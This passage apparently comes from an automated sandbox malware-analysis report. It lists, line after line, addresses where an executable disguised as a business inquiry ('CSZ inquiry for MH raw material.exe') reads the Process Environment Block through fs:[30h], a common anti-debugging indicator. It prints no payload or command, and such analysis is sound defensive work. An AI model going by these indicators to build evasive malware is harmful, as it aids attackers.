              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DFE443 mov eax, dword ptr fs:[00000030h]0_2_00DFE443
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DEA470 mov eax, dword ptr fs:[00000030h]0_2_00DEA470
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DEA470 mov eax, dword ptr fs:[00000030h]0_2_00DEA470
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DEA470 mov eax, dword ptr fs:[00000030h]0_2_00DEA470
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E7A456 mov eax, dword ptr fs:[00000030h]0_2_00E7A456
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E46420 mov eax, dword ptr fs:[00000030h]0_2_00E46420
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E46420 mov eax, dword ptr fs:[00000030h]0_2_00E46420
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E46420 mov eax, dword ptr fs:[00000030h]0_2_00E46420
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E46420 mov eax, dword ptr fs:[00000030h]0_2_00E46420
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E46420 mov eax, dword ptr fs:[00000030h]0_2_00E46420
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E46420 mov eax, dword ptr fs:[00000030h]0_2_00E46420
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E46420 mov eax, dword ptr fs:[00000030h]0_2_00E46420
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DF8402 mov eax, dword ptr fs:[00000030h]0_2_00DF8402
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DF8402 mov eax, dword ptr fs:[00000030h]0_2_00DF8402
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DF8402 mov eax, dword ptr fs:[00000030h]0_2_00DF8402
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DBE420 mov eax, dword ptr fs:[00000030h]0_2_00DBE420
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DBE420 mov eax, dword ptr fs:[00000030h]0_2_00DBE420
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DBE420 mov eax, dword ptr fs:[00000030h]0_2_00DBE420
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DBC427 mov eax, dword ptr fs:[00000030h]0_2_00DBC427
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC65D0 mov eax, dword ptr fs:[00000030h]0_2_00DC65D0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DFA5D0 mov eax, dword ptr fs:[00000030h]0_2_00DFA5D0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DFA5D0 mov eax, dword ptr fs:[00000030h]0_2_00DFA5D0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DFE5CF mov eax, dword ptr fs:[00000030h]0_2_00DFE5CF
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DFE5CF mov eax, dword ptr fs:[00000030h]0_2_00DFE5CF
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DFC5ED mov eax, dword ptr fs:[00000030h]0_2_00DFC5ED
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DFC5ED mov eax, dword ptr fs:[00000030h]0_2_00DFC5ED
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DEE5E7 mov eax, dword ptr fs:[00000030h]0_2_00DEE5E7
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DEE5E7 mov eax, dword ptr fs:[00000030h]0_2_00DEE5E7
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DEE5E7 mov eax, dword ptr fs:[00000030h]0_2_00DEE5E7
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DEE5E7 mov eax, dword ptr fs:[00000030h]0_2_00DEE5E7
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DEE5E7 mov eax, dword ptr fs:[00000030h]0_2_00DEE5E7
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DEE5E7 mov eax, dword ptr fs:[00000030h]0_2_00DEE5E7
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DEE5E7 mov eax, dword ptr fs:[00000030h]0_2_00DEE5E7
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DEE5E7 mov eax, dword ptr fs:[00000030h]0_2_00DEE5E7
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC25E0 mov eax, dword ptr fs:[00000030h]0_2_00DC25E0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DFE59C mov eax, dword ptr fs:[00000030h]0_2_00DFE59C
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E405A7 mov eax, dword ptr fs:[00000030h]0_2_00E405A7
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E405A7 mov eax, dword ptr fs:[00000030h]0_2_00E405A7
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E405A7 mov eax, dword ptr fs:[00000030h]0_2_00E405A7
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DF4588 mov eax, dword ptr fs:[00000030h]0_2_00DF4588
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC2582 mov eax, dword ptr fs:[00000030h]0_2_00DC2582
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC2582 mov ecx, dword ptr fs:[00000030h]0_2_00DC2582
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DE45B1 mov eax, dword ptr fs:[00000030h]0_2_00DE45B1
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DE45B1 mov eax, dword ptr fs:[00000030h]0_2_00DE45B1
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC8550 mov eax, dword ptr fs:[00000030h]0_2_00DC8550
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC8550 mov eax, dword ptr fs:[00000030h]0_2_00DC8550
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DF656A mov eax, dword ptr fs:[00000030h]0_2_00DF656A
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DF656A mov eax, dword ptr fs:[00000030h]0_2_00DF656A
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DF656A mov eax, dword ptr fs:[00000030h]0_2_00DF656A
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DEE53E mov eax, dword ptr fs:[00000030h]0_2_00DEE53E
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DEE53E mov eax, dword ptr fs:[00000030h]0_2_00DEE53E
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DEE53E mov eax, dword ptr fs:[00000030h]0_2_00DEE53E
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DEE53E mov eax, dword ptr fs:[00000030h]0_2_00DEE53E
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DEE53E mov eax, dword ptr fs:[00000030h]0_2_00DEE53E
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E56500 mov eax, dword ptr fs:[00000030h]0_2_00E56500
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD0535 mov eax, dword ptr fs:[00000030h]0_2_00DD0535
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD0535 mov eax, dword ptr fs:[00000030h]0_2_00DD0535
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD0535 mov eax, dword ptr fs:[00000030h]0_2_00DD0535
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD0535 mov eax, dword ptr fs:[00000030h]0_2_00DD0535
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD0535 mov eax, dword ptr fs:[00000030h]0_2_00DD0535
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD0535 mov eax, dword ptr fs:[00000030h]0_2_00DD0535
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E94500 mov eax, dword ptr fs:[00000030h]0_2_00E94500
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E94500 mov eax, dword ptr fs:[00000030h]0_2_00E94500
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E94500 mov eax, dword ptr fs:[00000030h]0_2_00E94500
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E94500 mov eax, dword ptr fs:[00000030h]0_2_00E94500
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E94500 mov eax, dword ptr fs:[00000030h]0_2_00E94500
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E94500 mov eax, dword ptr fs:[00000030h]0_2_00E94500
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E94500 mov eax, dword ptr fs:[00000030h]0_2_00E94500
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E3E6F2 mov eax, dword ptr fs:[00000030h]0_2_00E3E6F2
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E3E6F2 mov eax, dword ptr fs:[00000030h]0_2_00E3E6F2
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E3E6F2 mov eax, dword ptr fs:[00000030h]0_2_00E3E6F2
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E3E6F2 mov eax, dword ptr fs:[00000030h]0_2_00E3E6F2
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E406F1 mov eax, dword ptr fs:[00000030h]0_2_00E406F1
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E406F1 mov eax, dword ptr fs:[00000030h]0_2_00E406F1
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DFA6C7 mov ebx, dword ptr fs:[00000030h]0_2_00DFA6C7
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DFA6C7 mov eax, dword ptr fs:[00000030h]0_2_00DFA6C7
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC4690 mov eax, dword ptr fs:[00000030h]0_2_00DC4690
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC4690 mov eax, dword ptr fs:[00000030h]0_2_00DC4690
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DF66B0 mov eax, dword ptr fs:[00000030h]0_2_00DF66B0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DFC6A6 mov eax, dword ptr fs:[00000030h]0_2_00DFC6A6
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E8866E mov eax, dword ptr fs:[00000030h]0_2_00E8866E
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E8866E mov eax, dword ptr fs:[00000030h]0_2_00E8866E
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DDC640 mov eax, dword ptr fs:[00000030h]0_2_00DDC640
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DF2674 mov eax, dword ptr fs:[00000030h]0_2_00DF2674
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DFA660 mov eax, dword ptr fs:[00000030h]0_2_00DFA660
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DFA660 mov eax, dword ptr fs:[00000030h]0_2_00DFA660
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD260B mov eax, dword ptr fs:[00000030h]0_2_00DD260B
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD260B mov eax, dword ptr fs:[00000030h]0_2_00DD260B
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD260B mov eax, dword ptr fs:[00000030h]0_2_00DD260B
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD260B mov eax, dword ptr fs:[00000030h]0_2_00DD260B
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD260B mov eax, dword ptr fs:[00000030h]0_2_00DD260B
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD260B mov eax, dword ptr fs:[00000030h]0_2_00DD260B
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD260B mov eax, dword ptr fs:[00000030h]0_2_00DD260B
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E3E609 mov eax, dword ptr fs:[00000030h]0_2_00E3E609
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC262C mov eax, dword ptr fs:[00000030h]0_2_00DC262C
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E02619 mov eax, dword ptr fs:[00000030h]0_2_00E02619
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DDE627 mov eax, dword ptr fs:[00000030h]0_2_00DDE627
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DF6620 mov eax, dword ptr fs:[00000030h]0_2_00DF6620
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DF8620 mov eax, dword ptr fs:[00000030h]0_2_00DF8620
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E4E7E1 mov eax, dword ptr fs:[00000030h]0_2_00E4E7E1
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DCC7C0 mov eax, dword ptr fs:[00000030h]0_2_00DCC7C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC47FB mov eax, dword ptr fs:[00000030h]0_2_00DC47FB
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC47FB mov eax, dword ptr fs:[00000030h]0_2_00DC47FB
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E407C3 mov eax, dword ptr fs:[00000030h]0_2_00E407C3
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DE27ED mov eax, dword ptr fs:[00000030h]0_2_00DE27ED
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DE27ED mov eax, dword ptr fs:[00000030h]0_2_00DE27ED
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DE27ED mov eax, dword ptr fs:[00000030h]0_2_00DE27ED
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E747A0 mov eax, dword ptr fs:[00000030h]0_2_00E747A0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E6678E mov eax, dword ptr fs:[00000030h]0_2_00E6678E
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC07AF mov eax, dword ptr fs:[00000030h]0_2_00DC07AF
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC0750 mov eax, dword ptr fs:[00000030h]0_2_00DC0750
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DF674D mov esi, dword ptr fs:[00000030h]0_2_00DF674D
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DF674D mov eax, dword ptr fs:[00000030h]0_2_00DF674D
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DF674D mov eax, dword ptr fs:[00000030h]0_2_00DF674D
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC8770 mov eax, dword ptr fs:[00000030h]0_2_00DC8770
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD0770 mov eax, dword ptr fs:[00000030h]0_2_00DD0770
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD0770 mov eax, dword ptr fs:[00000030h]0_2_00DD0770
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD0770 mov eax, dword ptr fs:[00000030h]0_2_00DD0770
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD0770 mov eax, dword ptr fs:[00000030h]0_2_00DD0770
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD0770 mov eax, dword ptr fs:[00000030h]0_2_00DD0770
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD0770 mov eax, dword ptr fs:[00000030h]0_2_00DD0770
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD0770 mov eax, dword ptr fs:[00000030h]0_2_00DD0770
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD0770 mov eax, dword ptr fs:[00000030h]0_2_00DD0770
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD0770 mov eax, dword ptr fs:[00000030h]0_2_00DD0770
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD0770 mov eax, dword ptr fs:[00000030h]0_2_00DD0770
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD0770 mov eax, dword ptr fs:[00000030h]0_2_00DD0770
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD0770 mov eax, dword ptr fs:[00000030h]0_2_00DD0770
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E02750 mov eax, dword ptr fs:[00000030h]0_2_00E02750
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E02750 mov eax, dword ptr fs:[00000030h]0_2_00E02750
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E44755 mov eax, dword ptr fs:[00000030h]0_2_00E44755
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E4E75D mov eax, dword ptr fs:[00000030h]0_2_00E4E75D
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC0710 mov eax, dword ptr fs:[00000030h]0_2_00DC0710
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DF0710 mov eax, dword ptr fs:[00000030h]0_2_00DF0710
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E3C730 mov eax, dword ptr fs:[00000030h]0_2_00E3C730
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DFC700 mov eax, dword ptr fs:[00000030h]0_2_00DFC700
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DF273C mov eax, dword ptr fs:[00000030h]0_2_00DF273C
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DF273C mov ecx, dword ptr fs:[00000030h]0_2_00DF273C
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DF273C mov eax, dword ptr fs:[00000030h]0_2_00DF273C
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DFC720 mov eax, dword ptr fs:[00000030h]0_2_00DFC720
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DFC720 mov eax, dword ptr fs:[00000030h]0_2_00DFC720
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E8A8E4 mov eax, dword ptr fs:[00000030h]0_2_00E8A8E4
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DEE8C0 mov eax, dword ptr fs:[00000030h]0_2_00DEE8C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DFC8F9 mov eax, dword ptr fs:[00000030h]0_2_00DFC8F9
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DFC8F9 mov eax, dword ptr fs:[00000030h]0_2_00DFC8F9
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E908C0 mov eax, dword ptr fs:[00000030h]0_2_00E908C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC0887 mov eax, dword ptr fs:[00000030h]0_2_00DC0887
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E4C89D mov eax, dword ptr fs:[00000030h]0_2_00E4C89D
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC4859 mov eax, dword ptr fs:[00000030h]0_2_00DC4859
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC4859 mov eax, dword ptr fs:[00000030h]0_2_00DC4859
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DF0854 mov eax, dword ptr fs:[00000030h]0_2_00DF0854
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E56870 mov eax, dword ptr fs:[00000030h]0_2_00E56870
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E56870 mov eax, dword ptr fs:[00000030h]0_2_00E56870
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E4E872 mov eax, dword ptr fs:[00000030h]0_2_00E4E872
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E4E872 mov eax, dword ptr fs:[00000030h]0_2_00E4E872
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD2840 mov ecx, dword ptr fs:[00000030h]0_2_00DD2840
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E6483A mov eax, dword ptr fs:[00000030h]0_2_00E6483A
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E6483A mov eax, dword ptr fs:[00000030h]0_2_00E6483A
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DE2835 mov eax, dword ptr fs:[00000030h]0_2_00DE2835
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DE2835 mov eax, dword ptr fs:[00000030h]0_2_00DE2835
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DE2835 mov eax, dword ptr fs:[00000030h]0_2_00DE2835
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DE2835 mov ecx, dword ptr fs:[00000030h]0_2_00DE2835
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DE2835 mov eax, dword ptr fs:[00000030h]0_2_00DE2835
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DE2835 mov eax, dword ptr fs:[00000030h]0_2_00DE2835
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DFA830 mov eax, dword ptr fs:[00000030h]0_2_00DFA830
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E4C810 mov eax, dword ptr fs:[00000030h]0_2_00E4C810
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E4E9E0 mov eax, dword ptr fs:[00000030h]0_2_00E4E9E0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DCA9D0 mov eax, dword ptr fs:[00000030h]0_2_00DCA9D0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DCA9D0 mov eax, dword ptr fs:[00000030h]0_2_00DCA9D0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DCA9D0 mov eax, dword ptr fs:[00000030h]0_2_00DCA9D0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DCA9D0 mov eax, dword ptr fs:[00000030h]0_2_00DCA9D0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DCA9D0 mov eax, dword ptr fs:[00000030h]0_2_00DCA9D0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DCA9D0 mov eax, dword ptr fs:[00000030h]0_2_00DCA9D0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DF49D0 mov eax, dword ptr fs:[00000030h]0_2_00DF49D0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E569C0 mov eax, dword ptr fs:[00000030h]0_2_00E569C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DF29F9 mov eax, dword ptr fs:[00000030h]0_2_00DF29F9
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DF29F9 mov eax, dword ptr fs:[00000030h]0_2_00DF29F9
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E8A9D3 mov eax, dword ptr fs:[00000030h]0_2_00E8A9D3
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E489B3 mov esi, dword ptr fs:[00000030h]0_2_00E489B3
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E489B3 mov eax, dword ptr fs:[00000030h]0_2_00E489B3
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E489B3 mov eax, dword ptr fs:[00000030h]0_2_00E489B3
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC09AD mov eax, dword ptr fs:[00000030h]0_2_00DC09AD
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC09AD mov eax, dword ptr fs:[00000030h]0_2_00DC09AD
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD29A0 mov eax, dword ptr fs:[00000030h]0_2_00DD29A0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD29A0 mov eax, dword ptr fs:[00000030h]0_2_00DD29A0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD29A0 mov eax, dword ptr fs:[00000030h]0_2_00DD29A0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD29A0 mov eax, dword ptr fs:[00000030h]0_2_00DD29A0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD29A0 mov eax, dword ptr fs:[00000030h]0_2_00DD29A0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD29A0 mov eax, dword ptr fs:[00000030h]0_2_00DD29A0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD29A0 mov eax, dword ptr fs:[00000030h]0_2_00DD29A0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD29A0 mov eax, dword ptr fs:[00000030h]0_2_00DD29A0
